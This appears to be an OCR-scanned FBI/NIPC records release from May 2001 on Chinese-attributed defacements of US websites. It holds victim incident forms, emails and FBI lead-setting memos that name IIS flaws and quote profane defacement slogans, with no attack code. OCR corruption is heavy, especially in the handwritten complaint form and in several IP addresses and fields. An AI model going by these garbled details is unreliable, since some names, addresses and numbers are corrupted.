National: http://www.nipc.gov/ 

Local PH Chapter: http://infragard.hmconsulting.net/index.html 


The information transmitted is intended only for the person or 
entity to which it is addressed and may contain confidential 
and/or privileged material. Any review, retransmission, 
dissemination, or other use of, or taking of any action in reliance 
upon, this information by persons or entities other than the 
intended recipient is prohibited. If you received this in error, 
please contact the sender and delete the material from any 
computer. 


b6 
b7C 


Subject: Cyber Incident Report Form 


Date: : 
From 
To: "nipc.watc i.gov^ «nipc.watc 1.gOV> 


001; 11:00 am 


Organization=Hershey Foods Corporation 

Addrs_Street=200 Crystal A Drive 

City=Hershey 

State=Pa 

Zip Code=17033 

CountryzUSA 

Question1_Organization=SAME 

Question1_Contact_Info= 

Question1 Tele Number- 

Question1_Street=SAME 

Question1 City State Zipcd- 

Question1, Country- 

Question1 Email- 

Question2, Location-200 Crystal A Drive, 

Hershey PA 

Question3_Date_Time=May 8, 2001; 6:30am 
Question4_Critical=Yes 
Question5_crit_infrasture=Telecommunications 
Question5_Remarks=Front-end web server to remote partners 
Question6_nature_of_prob=Web site defacement 

Question6_other= 

Question7_exp_problem=No 

Question7_Remarks=No Remarks 
Question8_method_of_attack=Vulnerability exploited 
Question8_Remarks=Appears to have been exploit of the IIS."web server folder 
traversal” (MS00-078/057) ] 
Question9 sus perpetrators-Unknown 

Question9_Remarks=No Remarks 

Question10 ip addrs-2106.234.227.6 

Question11 evid of spoof-Unknown 
Question12 oper systems-Windows 

Question12_Remarks=NT4 (SP6a) running IIS 4.0 

Question13 security infrasturezIncident/Emergency Response Team 
Question13, security infrasture-Firewall 
Question13 security infrasture-Banners 
Question14 attack loss infoz-No 

Question14_Remarks=No Remarks 

Question15 damage systms-Yes 

Question15_Remarks=appears limited to defacement of the web page and 
creation of new web folders containing copies of the defaced page 
Question16_what_actions=System(s) disconnected from the network 
Question16_what_actions=Other 

Question16_what_actions=Log files examined 

Question16 Remarkszeffected machine removed from service pending rebuild & 
redeployment; existence of appropriate patches verified/applied to similar 
machines ; 


E b6 
E b7C 


Question17, Field Office= 
Question17_fieldoff_inform=No 
Question18_agency_inform=Yes 
Question18 State local Police= 

Question18 Inspector General= 

Question18 CERT-CC- 

Question18 FedCIRC- 

Question18 JTF-CND- 

Question18 Other-TruSecure Corp 

Question19 date of last update-Dec 19-20, 2000 
Question19 org work update-Hershey Foods NT admin group 
(our own staff) 

Question20 POC Information= 
Question20 sys adm, contractzNo 
Question21_remarks=defaced page read: 

f*** USA Government 

f*** Poizon BOx . 

contact:sysadmcn(yyahoo. com.cn 


IP source address traced to ThePlanet.com Internet Services, Dallas TX. 


Have examined (and am retaining) copies of NT event, IIS and firewall logs. 


From: - 


To: 
Date: 5/16/01 7:57PM 
Subject: Incident Report, Chinese Web Defacement. 


The following incident report was received by the NIPC Watch. It involves a telecommunications firm 
that suffered a Web defacement from an apparent Chinese hacker group. It was not assigned an 
Incident Report number, and is being forwarded for your information/action. 


Regards, 
NIPC Watch and Warning Unit. 


Subject: Cyber Incident Report Form 


Date: Wed, 16 May 2001 12:15:52 -0400 
From b6 
To: «nipc.watc QOV. b7C 


Report ime= 

Name 

Title 

Telephone Fax Number=610-375-8425 4 |] 

Email 

Organization=Unconundrum 

Addrs_Street=42 South 5th St. 

City=Reading 

State=PA 

Zip Code=19602 

Country=USA 

Question{_Organization= Prince Law Offices 

Question1_Contact 73 Sam 

Question1 Tele Numbe 

Question1_Street=646 Lenape Road 
Question1_City_State_Zipcd=Bechtelsville, PA 19505 

Question1 CountryzUSA 

Question1 Email=troubleshooters@princelaw.com 

Question2 Location-second floor computer room connected to the internet 
through a wan connection to the office in Reading, PA, behind a 
Checkpoint Firewall-1 

Question3 Date Timez05/15/2001 23:28 - 23:36 
Question4_Critical=Yes 

Question5_crit_infrasture=Other 
Question5_crit_infrasture=Telecommunications 
Question5_Remarks=corporate intranet 
Question6_nature_of_prob=Web site defacement 

Question6_other= 

Question7_exp_problem=Yes 

Question7_Remarks=Happened before on 05/07/2001 7:50 AM and 05/12/2001 
12:23 AM, thought we patched the hole but didn't 

Question8 method, of; attackzVulnerability exploited 

Question8 Remarks-we installed snort to do intrusion detection and 
discovered the attempt last night to exploit a server using the IIS 
Unicode bug 

Question9 sus perpetrators-Other 
Question9_Remarks=pro-chinese anti-us rhetoric related to the following 
advisory http://www.nipc.gov/warnings/advisories/2001/01-009.htm 


zu" wu 


Incident Report, 


Question10 ip addrs-210.46.96.1 

Question11, evid .of spoof-Unknown 

Question12 oper, systems-NT 

Question12 oper. systems-Windows 

Question12 Remarks-Windows 2000 advanced server and IIS 5.0 
Question13, security. infrasture-Firewall 
Question13, security infrasture-Intrusion Detection System 
Question14 attack loss info-Unknown 

Question14 Remarkszunknown, but our exchange server was compromised 
which contains a lot of sensitive legal information for the law office 
Question15 damage systms-Yes 

Question15 Remarks-so far all we know that was damaged was the front 
page of the intranet website, which was restored from a backup 
immediately 

Question16, what, actions-System(s) disconnected from the network 
Question16 what actions-Backup of affected system(s) 
Question16 what actions-Other 

Question16 what, actions-Log files examined 

Question16 Remarks-ips related to the attack have been added to firewall 
and blocked all traffic, backup in progress and will be moving exchange 
mail server and intranet website to a newly installed server tonight 
Questiont7, Field Office- 

Question17_fieldoff_inform=No 

Questioni8_agency_inform=No 

Question18 State local Police= 

Question18 Inspector General- 

Question8 CERT-CC- 

Question18 .FedCIRC^ 

Question18_JTF-CND= 

Question18 Other- 

Question19 date of last updatez05/15/2001 
Question19 org work update-we did (intranet website is constantly 
modified in house) 

Question20_POC Information 

Question20 sys adm contract-No 

Share Info With=Infrastructure Orgs 

Question21, remarks-No additional remarks 
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Name of Otfice 


Subject: Chany Lt ase Aiea tara 
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Nader Pnfrastiucturm Vb ota rion Conter 
| 


TW D 


X Fucident Reports 


| Incident Report | Victim Information | Privacy Notice | NIPC Home | 


Cyber Threat and Computer Intrusion 
Incident Reporting Guidalinos 


This form may be used as a guide or vehicle for reporting cyber threat and tomputer intrusion 
incident information to the NIPC or other law enforcement organizafion. It is recommended that these 
Cyber Incident Reporting Guidelines be used when submitting a report to a local FBI Field Office. 


Do NOT include CLASSIFIED information on this form uniess you adhere to applicable pracedures 
for proper marking, handling and transmission of classified information. Please contact NIPC Watch 
Operations Center (202) 323-3205 to arrange secure means to submit classified information. 


Information concerning the identity of the reporting agency, department, company, or individual(s) will 
be treated on a confidential basis. If additional information is required, you will be contacted directly. 


Report Date/Time: May 10 20 01 


] | SECTION 1 


Point of Contact (POC) Information 


Nam 


Titi 


Telephone/Fax Number: [___ [isms | 
end 


Organization: Adis International Inc 


820 Town Center Drive 


Address: Street]... 


http://www.nipe.gov/incident/cirr.bim 05/10/2001 
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w- "T (Co. 


National Infrastructure Protecti 


NO. 726 P 


.4 
posce E ADIS INT'L, INC, PAGE 83/07 


enter (NIPC) - Incident Report - Intellettual Property R.. Page 2 of 6 


incident Information 


Name of Organization: (if same as above, enter "SAME") 
SAME ' 


n deals ae DA ER sas E me eot comme 


rn (Check here if Federal Government 


Organization's contact Information: 
SAME 


eta eh eomme nee D^ e 


Telephone Number: 


Side pot ei n reais ote il ak. A. lc aa 
City, State, Zin Code: 


Auckland New Zealand and the other is 
locate in 511 Avenue of the Americas, 
NY NY 1011 


UePDAPÉ DA meere arnroma P e ERR AR EPP Fein m tnnt mrs 


co M 


Date/Time and duration of incident: 


Is the affected system/network critical to the organization? 
© Yes C No 


. Critical Infrastructure sector(s) affected. (Check all that apply) 


| Power r Transportation 

I" Banking and Finance T" Emergency Services 

r Government Operations r Water Supply Systems 

F. Gas & Oil Storage and Delivery a Other (Provide details in remarks) 
E! Telecommunications r Not applicable 


http//www.nipc.gov/incidentcirr.htm 05/10/2001 
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Remarks: fAuckland site is email. New York site 
is an ecommexce site Pu 


R 
u 
MR "n ` D CES T m 


6. Nature of Problem? (Check all that apply) 


Fi Intrusion, iv System impairment/denial resources 
F] Unauthorized root access Web site defacement 

M Compromise of system integrity T Hoax 

I" Theft E Damage 


r Unknown r Others. 


7. Has this problem been experience before? (If yes, please explain in remarks section): 
© Yes € No 


Remarks: {No Remarks 


8. Suspect method of intrusion/attack 


[T virus (provide name if known) r Vuinerability exploited (explain) 
I Denial of Service r Trojan horse 

F Distributed Denial of Service r Trapdoor 

TT Unknown I" Other (Provide details in remarks) 
Remarks:|IIiS (Web Server) leaks. Patched by 


applying appropriate patches." 


wees 


9, Suspect perpetrator(s) or possible motivatlon(s) of the attack 


r Insider/Disgruntled employee I Former employee 
F Competitor V" Other (Explain in remarks) 
i Unknown 


Remarks:[No Remarks 


http://wwrw.nipc.gov/incidentcirr.htm 05/10/2001 
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10. The apparent source (IP address) of the Intrusion/attack. 


11. Evidence of spoofing? 
C Ves C No 
@ Unknown 


12. What computers/systems (hardware and software) were affected? (Operating system, 


version): 
[^ Unix V os2 
Fi Linux T'vAXNMS ` 
Mint T Windows 
V:SunOS/Solatis . [^ Other (Provide specify in remarks) 


Remarks: 


13. Security Infrastructure in place. (Check all that apply) 
ri [ncident/Ernergency Response Team U Encryption 


V Firewall T Secure Remote Access/Authorization tools 
F Intrusion Detection System r. Banners 
II Security Auditing Tools V Access Control Lists 
Ul Packet filtering 
14. Did the intrusion/attack result in a loss/compromise of sensitive, classifed or proprietary 
information? : 
© Yes (Provide details in remarks) @ No 
© Unknown 


Remarks: [No Remarks 


15. Did the intrusion/attack result In damage to system(s) or data? 
C Yes (Provide details In remarks) & No 


Remarks: iNo Remarks 


http://www.nipc.gov/incident/cirr.htm 05/10/2001 
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16. What actions and technical mitigation have been taken? 
M Systems) disconnected from the natwork B System Binaries checked 


I! Other (Please provide detalls in 
remarks) 


n Log files examined I No action(s) 


E Backup of affected system(s) 


Remarks: |Web server patches have been applied t 
the New Zealand site, We are in the 
proces of patching the New York site E 


17. Has the local FB! field office been informed? 


€ Yes (Which Office)!" C No 
18. Has another agency/organization been informed? If so, please provide name and phone 
number. 
C Yes € No 


s State/local police). 


Inspector General]. 


FedCIRC L... ..... .. 


Ld 


e JIRCNDELL. e. o sos uud 


Other (Incident Response, law enforcement ete.) 


19. When was the last time your system was modified or update? 
Date: unknown Sao? ien & 
anization that did work (Address, phone, POC information): 


Company/O 


20. Is the System Administrator a contractor? 
€ Yes (Provide POC Information) C No 


b6 
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2]. In addition to being used for law enforcement or national security purposes, the intrusion- 
related information 1 reported my be shared with: 
I" The Public Fi infraGard Members with Secure Access 
22. 


Additional Remarks: (Please limit to 500 characters. Amplifying information may be submitted 
separately. 


The messages that were left on bothe sites were P 
"fuck USA goverment Fuck PoizonBox" $5 


identical. 


if the reported incident is determined to be a criminal matter you may be contacted by an agent for 
additional information. 


rm a ah rita oh rir m rite o 
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Squad 9 

From: 

To: Squad 9 <sq9.ph@fbi.gov> 
Sent: Friday, May 18, 2001 9:15 AM 


Subject: Re: website hacker 


Hi -per your request, our business name and address is Strafford Mechanical, Inc. 37 Industrial 
Boulevard, Paoli 301, Thanks, 


— Original Message ----- 


| From: 
| To 
| Sent: Friday, May 18, 2001 8:51 AM 


| Subject: Re: website hacker 


[—1 


i 
i : Thanks for informing us of your incident. Please send me your business name, business address, we are 
i collecting information on victims (there are several) in the Eastern PA area and are addressing the issue. | 
i have your name and phone but need then other two pieces of info to put in our database. 


| Thanks. 
| 


FBI Philadelphia - Squad 9 
NIPC Computer Intrusion Program 
| (215) 418-4000 
| National: http://www.nipc.gov 
| Local PH Chapter: http://infragard.nmconsulting. lindane html 


i The information transmitted is intended only for the person or entity 

i to which it is addressed and may contain confidential and/or 

i privileged material. Any review, retransmission, dissemination, or 

i other use of, or taking of any action in reliance upon, this information 
: by persons or entities other than the intended recipient is prohibited. 

i If you received this in error, please contact the sender and delete 

i the material from any computer. 


-=--> Original Message ----- 
Fom[  — ] 

To: sq9.ph@fbi.gov 

Sent: Thursday, May 17, 2001 5:12 PM 
Subject: website hacker 


Hi-My website pages of >straffordm.com -was replaced by a hacker who wrote fuck the usa government fuck 
poison box. it is still avialable to see via google search and clicking on links offered. for straffordm.com 

i did a search of both phrases and despite their being many similarities, the phrase as noted, seems 
somewhat unique to our invasion. We are working on the problem internally, but I wanted to 
contact you. 


Strafford Mechanical, Inc. 


5/18/01 
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Squad 9 

From: b6 
To: | *SqUjp [gov b7C 
Sent: Wednesday, May 16, 2001 10:12 AM 


Subject: Help please - Pirated Programs and Ouside Attack 

On Monday of this week we discovered and stopped a hacker group from using our FTP site as a store and. 
forward point for what appeared to be pirated Sega files. Since that point in time we now appear to be under a 
concerted attack from all over the globe in an attempt to breach our systems. ! have been asked by the 


president of our firm to contact you and to provide you with whatever information and assistance | can to help 
you find, stop and prosecute the individuals involved. 


| am afraid that they may have successfully breached our security and am now in the process of shutting 
down as many services that could be providing them holes. 


The sites presently under attack are in the IP range 205.146.157.1 with a subnet mask of 255.255.255,192. => 
| appreciate any help or assistance you can provide in this matter. 


Cordially, 


b6 
b7C 


echnomic Publishing Company 
851 New Holland Ave., Box 3535 
Lancaster, PA, 17604 

U.S.A, 

Voic 


Fax: (717) 295-4538 
E-Mail 
Websites: 


http://www.techpub.com 

http://www.tcl.to 

hitp:/Avww.healthpack.net 

http://www. air-bag.net 

http://www. flavor-works.com 
http:/Avww.compositesoftware.com 
http:/Avww.technomicjournals.com Under Construction 


While attachments are virus checked, Technomic Publishing Co., Inc. does not accept any liability for a virus 
which is not detected. 


5/16/01 


Complaint Form E 
FD-71 (Rev. 4-13-92) 


NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: (2 Negative |) See below 
Subject's name and aliases Character of case 


CHINA. NET HUNAN “Computer hacker] WoW 


PROVINCE NETWORK eL —H [9 
|L VLAE ALCON COM) 


Complaint received 


C Personal Ns roephonic Date 5 Jos aoo. ps Qo 


Qu | Complainant's address and LS MC uli (S\ DREA . IN 
NR 03, e 


Complainants DOB Race Sex 


M 


Sex Height i i | Birth Date and Birthplace 
C Male ` 
L Female 


Weight Complexion Social Security Number 


Subject's 
Description 


Scars, marks and other data 


Facts of complaint 


Co : VILLAGEAUCTION. CO 
m a can W non. Are wihen A ne hy ENE d es four Thar 
Anon Ug, A Bo Mud Ma Ccmpany Wad po Ry 
m iUm C TEE A LN PTL ny prog am epos 7 Ao ao 


TET "E The cce ch occurred Kron Osca 33 
VC Am A APPLA wel ho we Cos Aiud 


Con koner loe to Cod FRI l| Reca ^ae of | 
Je On ME Poema wih Cuira fece dg, Td p 2 
Co vegan, M dm vro e NECS ae EO oap 


2 prdence ade ae owak phor Col from FRI" 
Com P OSL RxQET e 


Do not write in this space. 
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(Complaint received by) BLOCK STAMP 
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From: b6 
To: b7C 
Sent: ursday, Way 17, 718 PM b7E 


Attach: nsmailJ2.TMP 
Subject:  [Fwd: FW: website defacement report] 


E : 
b7C 
Here is the info regarding reported attacks on systems of Chinese 
origins. The forwarded infor is from the message I received from Penn 
State University, Harrisburg, PA Campus bn 
advised PSU Main Campus advised him that they would be the 


main point of contact for the University. However] |reported the 
incident at our local campus. 


The following are other victims: 


MILLER'S CAPITAL INSURANCE 
805 North Front Street 


Harrisburg, PA 17102 
POC: b6 
Telephone BIC 


DELOITTE CONSULTING GROUP 
3600 Vartan Way 


Harrisburg, PA 17110 

POC,| | 
telephone 717/651-2858 

fax 717/651-2819 


(This group hosts a Pennsylvania State Government Labor and Industry 
web site known as "PA New Hires.com") 


APR SUPPLY COMPANY (APR SUPPLY.COM) 
305 North 5th Street 


Lebanon, PA 17022 
POC; 
Telephon 


Commonwealth of Pennsylvania (Three separate web 
sites)(CHIPS@state.pa.us/PSERS@state.pa.us/and one other) 

Commonwealth Technology Center (CTC) 

] Technology Park 


Harrisburg, Pennsylvania 
POC: 
Telephon 


CIBER 


5/17/01 


EE Cc ene 
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650 Wilson Lane 


Mechanicsburg, PA 17055 
POC: : b6 
Telephon l b7C 


[ H also understand some Navy Depot web sites were hit, but 


details are n 
POC: S IDCIS, 717/770-2894 is collecting data. 


Do you want an EC on the above? 


[— 


5/17/01 


(01/26/1998) 6 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/03/2001 
To: San Francisco Attn: Squad 14B - Computer Intrusion 
b6 
From: Chicago b7C 
Squad IP/C b7E 


Contact: SA 312/786-3918 
Approved By: 


Drafted By: 


Case ID d: (Pending) 

Title: Subject:  Hacker/Honker Union of China 
Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set lead for s[ to perform pm 


appropriate investigation. 


Administrative: Reference telephone call between sa ^ ]ana SA 
on May 3, 2001. 


Details: , May 3, 2001, by 
at Charles Schwab & 
ompany , an chwab's Web sites, 
www.schwabplan.com, had been defaced. The defacement was 
discovered late in the afternoon of May 3. The defacement has a 
derogatory statement towards the United States government and a 


derogatory statement towards "PoizonBOx". 


Analysis of how the attack was carried out is still 
ongoing. 


To: j trom: Chicago 
Re: 05/03/2001 


LEAD (s): 
Set Lead 1: 
SAN FRANCISCO 
AT SAN FRANCISCO, CA 


It is requested that S 
investigation and forward result 


** 


conduct appropriate 
S to SA 


b3 
b7E 


b6 
b7C 


ïí 


i* 1 


& 


(01/26/1998) | e 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/12/2001 


To: Washington Field Attn:  NIPC Squad 
ssa| | 


From: Chicago 
Squad IP/C 
Contact: 


SA 312/786-3918 
Approved By: 
Drafted By: 
Case ID d: Pending) 


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set lead for Washington Field Office, NIPC Squad, 
sa| | 


Administrative: Reference telephone call on May 8, 2001, between 


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 8, 2001, sal  ]eentactea sa[  ] to inform 
that Washington Field Office was receiving numerous complaints 
regarding Web site defacements possibly attributable to Chinese 
hackers. 


b3 
b6 
b7C 
b7E 


b6 
b7C 


To: Washington ne From: Chicago e 
Res O T 05/22/2001 


LEAD (s): 
Set Lead 1: 
WASHINGTON FIELD 


AT WASHINGTON, D.C. 


It is requested that sa[ _|perform appropriate 
investigation, more specifically, obtain log files from the 


victim servers and provide FD 302s regarding the defacements 
log files, and forward all information to SA 


++ 


b7E 


b6 
b7C 


and 


e 


on 
(01/26/1998) o 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/12/2001 
To: Washington Field Attn: Squad NS 18 b3 
b7C 
From: Chicago b7E 
Squad IP/C 
Co i 312/786-3918 


Approved By: 
Drafted By: 
Case ID ds Pending) 


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set lead for Washington Field Office, NIPC Squad, 

b7C 
Administrative: Reference telephone call between sa| ^ pea 
sa[ ] on May 9, 2001. 


Details: omputer Investigations Unit (CIU) was contacted by 
Detective fot the i States Capital Police. Detective 

informed CIU thac[ received a call on Monday, April 30, 
2001, at approximately 5:00pm from the United States House of 
Representatives Publication Services Department advising that 
their Web page had been defaced. 


The defacement contained the phrase, written in 
English, "What happened to this U.S. Site?", signed "nanilnanl". 
The logs from the intrusion have been preserved and the origin of 
the attack has been traced to "nanlnanl.51.net" in China. 


b3 
b6 


b7C 


EM BF Bee 


To: Washington BR.. From: Chicago 
b7E 


LEAD(s): 
Set Lead 1: 
WASHINGTON FIELD 


AT WASHINGTON, DC 


It is requested that sal__|perform appropriate b6 
investigation, more specifically, obtain log files from the bic 
victim server and provide an FD 302 regarding the défacement and 
log files, and forward all information to SA SA 


has been provided advance copies of the necessary information. 


++ 


(01/26/1998) : © 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/12/2001 
To: St. Louis Attn: NIPC Squad b3 
b7C 
From: Chicago b7E 
Squad IP/C 


Contact: SA 312/786-3918 
Approved By: 
Drafted By: 
Case ID d: (Pending) 


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: T et leads for St. Louis Division, NIPC Squad, SA b6 
| | b7C 
inistrative: Reference telephone call between EN SA 
on May 8, 2001. 


Details: Chicago Division is the lead office for the criminal 
investigation of the Honker Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 8, 2001, sa| |contactea SA to inform 
that St. Louis Division had received a complaint regarding a Web 
site defacement attributable to the Honker Union of China. The 
victim Web site belonged to Cybercon, Inc., 210 North Tucker, 
Seventh Floor, St. Louis, Missouri. 


After the defacement, the Web site showed a picture of 
the Chinese flag, a statement "President is Murderer" and another 
statement that the Honker Union of China was responsible. 


To: St. Louis From: Chicago 
b7E 


LEAD(s 
Set Lead 1: 
ST. LOUIS 
AT ST. LOUIS, MO 
It is requested that SA[ ^ ]perform appropriate b6 
investigation, more specifically, obtain log files from the b7C 


victim servers and provide FD 302s regarding the defacements and 
log files, and forward all information to SA 


** 


FEDERAL BUREAU OF INVESTIGATION 


(01/26/1998) 


Precedence: ROUTINE Date: 05/12/2001 


To: Sacramento Attn:  Squ 
SSA 


From: Chicago 
Squad IP/C 
Contact: 


SA 312/786-3918 
Approved By: 


Drafted By: 


Case ID id: Pending) 

Title: Subject:  Hacker/Honker Union of China 
Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


e To set leads for Sacramento Division, Squad 5, SA 


Administrative: Reference telephone call between sM[ — Jana 
saM[ ^ ]on May 11, 2001. 


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 11, 2001, sd ]eontactea sa| jte inform 


that Sacramento Division was receiving numerous complaints 
regarding Web site defacements possibly attributable to Chinese 
hackers. Many of the sites contained the following statement, 
"fuck USA Government fuck PoizonBOx 
contact:sysadminGyahoo.com.cn", a common statement seen on many 
of the defacements reported by other divisions. 


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 


b3 
b6 
b7C 
b7E 


b6 
b7C 


To: Sacramento From: Chicago 
b7E 


LEAD(s): 
Set Lead 1: 
SACRAMENTO 
AT SACRAMENTO, CA 
It is requested that <i, Dene S C appropriate b6 
investigation, more specifically, obtain log files from the b7C 


victim servers and provide FD 302s regarding the defacements and 
log files, and forward all information to SA 


++ 


FEDERAL BUREAU OF INVESTIGATION 


(01/26/1998) 


Precedence: ROUTINE Date: 05/12/2001 
To: Dallas Attn: ` NIP b3 
SSA b6 
b7C 
From: Chicago b7E 
Squad IP/C 
Contact: SA 312/786-3918 
Approved By: 
Drafted By: 
Case ID d: (Pending) 
Title: Subject:  Hacker/Honker Union of China 
Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 
Synopsis: To set leads for Dallas Division, NIPC Squad. b6 
b7C 


mug E: Reference telephone call between ms[ ] 


and SA[ ^ ]on May 8, 2001. 


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 8, 2001, igsS[ ^  ]eentactea sA[  ]to 
inform that Dallas Division was receiving numerous complaints 
regarding Web site defacements possibly attributable to Chinese 
hackers. Many of the sites contained the following statement, 
"fuck USA Government fuck PoizonBOx 
contact:sysadmineyahoo.com.cn", a common statement seen on many 
of the defacements reported by other divisions. 


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 


est x 
b6 


b7C 


Co 134 lec HE 


To: Dallas From: Chicago 
Re: [ 5 ] 05/12/2001 b3 


b7E 
LEAD(s): 
Set Lead 1: 
DALLAS 
AT DALLAS, TX 
It is requested that Dallas Division, NIPC Squad, 
perform appropriate investigation, more specifically, obtain log 
files from the victim servers and provide FD 302s regarding the 
defacements and log files, and forward all information to SA 
b6 
b7C 


** 


(01/26/1998) B e 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/12/2001 


To: Mobile Attn:  Squ 
SSA 


From: Chicago 
Squad IP/C 
Contact: 


SA 312/786-3918 
Approved By: 


Drafted By: 


Case ID #: ending) 

Title: Subject: Hacker/Honker Union of China 
Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


a To set leads for Mobile Division, Squad 5, sat 


Administrative: Reference telephone call between sal Jana 
SA on May 9, 2001. 


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 9, 2001, sA[ ]eontactea SA to inform 
that Mobile Division was receiving numerous complaints regarding 
Web site defacements possibly attributable to Chinese hackers. 
Many of the sites contained the following statement, "fuck USA 
Government fuck PoizonBOx contact:sysadmin@yahoo.com.cn", a 
common statement seen on many of the defacements reported by 
other divisions. 


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 


OO ——] 


| /ad ec 


b3 
b6 
b"7C 
b7E 


b6 
b7C 


b3 
b6 
b7C 
b7E 


® 


To: Mobile From: Chicago 
b7E 


LEAD(s): 
Set Lead 1: 
MOBILE 


AT MOBILE, AL 


b6 


It is requested that sls perform appropriate ics 


investigation, more specifically, obtain log files from the 
victim servers and provide FD 302s regarding the defacements and 
log files, and forward all information to SA[ | 


** 


(01/26/1998) f e 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/12/2001 
To: Milwaukee Attn: Squ b3 
SSA b6 
b7C 
From: Chicago b7E 
Squad IP/C 


Contact: SA 312/786-3918 
Approved By: 
Drafted By: 
Case ID #: Pending) 


Title: Subject: Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
| Type: Intrusion 


| Date: 04/03/2001 


| Synopsis: To set leads for Milwaukee Division, Squad 5, SAs = 
pe ee el c 


Administrative: Reference telephone call between SAs[ ^ ]anaà 
and SA[ jon May 9, 2001. 


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 


defacements. 
On May 9, 2001, SAs contacted SA 
Lal inform that Milwaukee Division was receiving numerous 
complaints regarding Web site defacements possibly attributable 


to Chinese hackers. Many of the sites contained the following 
| Statement, "fuck USA Government fuck PoizonBOx 
contact:sysadminGyahoo.com.cn", a common statement seen on many 
of the defacements reported by other divisions. 


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 


b7E 


/38| Oec 


b3 | 
b6 | 
b7C 


To: Milwaukee From: Chicago 
Re: [ ——  — | os/12/2001 


LEAD (s): 
Set Lead 1: 
MILWAUKEE 
AT MILWAUKEE, WI 


It is requested that ern) 
appropriate investigation, more specifically, obtain log files 


from the victim servers and provide FD 302s regarding the 
defacements and log files, and forward all information to SA 


++ 


b3 
b7E 


b6 
b7C 


Ld 


"e 


(01/26/1998) | e 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/12/2001 

To: Charlotte Attn: Raleigh, NC Resident Agency 
Squad 7 
SA 


From: Chicago 
Squad IP/C 
Contact: 


SA 312/786-3918 
Approved By: 
Drafted By: 
Case ID #: ending) 


Title: Subject: Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set leads for Charlotte Division, Raleigh, NC 


ST Reference telephone call between sA[ Jana 


SA on May 9, 2001. 


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 9, 2001, mM aoe sA[ ^ ]to inform 


that he was receiving numerous complaints regarding Web site 
defacements possibly attributable to Chinese hackers. Many of 
the sites contained the following statement, "fuck USA Government 
fuck PoizonBOx contact:sysadmin@yahoo.com.cn", a common statement 
Seen on many of the defacements reported by other divisions. 


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 


b7E 


b6 
b7C 


139 I lfec 


To: Charlotte A Chicago 
Re: Ls 05/12/2002 b3 


b7E 
LEAD (s): 
Set Lead 1: 
CHARLOTTE 
AT RALEIGH, NC 
It is requested that SAL. ]perform appropriate b6 
investigation, more specifically, obtain log files from the bic 


victim servers and provide FD 302s regarding efacements and 
log files, and forward all information to SA 


++ 


p P 
QM 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/12/2001 
To: Boston Attn: Squ = b3 
b7C 
From: Chicago b7E 
Squad IP/C 
Contact: SA 312/786-3918 


Approved By: 
Drafted By: 
Case ID #: 


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set leads for Boston Division, Squad C-11, SA b6 
| | b7C 


inistrative: Reference telephone call between sa| ana SA 
on May 9, 2001. 


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 9, 2001, sal  ] contacted sa[  ] to inform 
that Boston Division was receiving numerous complaints regarding 
Web site defacements possibly attributable to Chinese hackers. 
Many of the sites contained the following statement, "fuck USA 
Government fuck PoizonBOx contact:sysadmin@yahoo.com.cn", a 
common statement seen on many of the defacements reported by 
other divisions. 


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 


To: Boston From: » : 


Re: D e ——] 05/12/2001 


LEAD(s): 
Set Lead 1: 
BOSTON 


AT BOSTON, MA 


It is requested that sal__] perform appropriate 
investigation, more specifically, obtain log files from the 


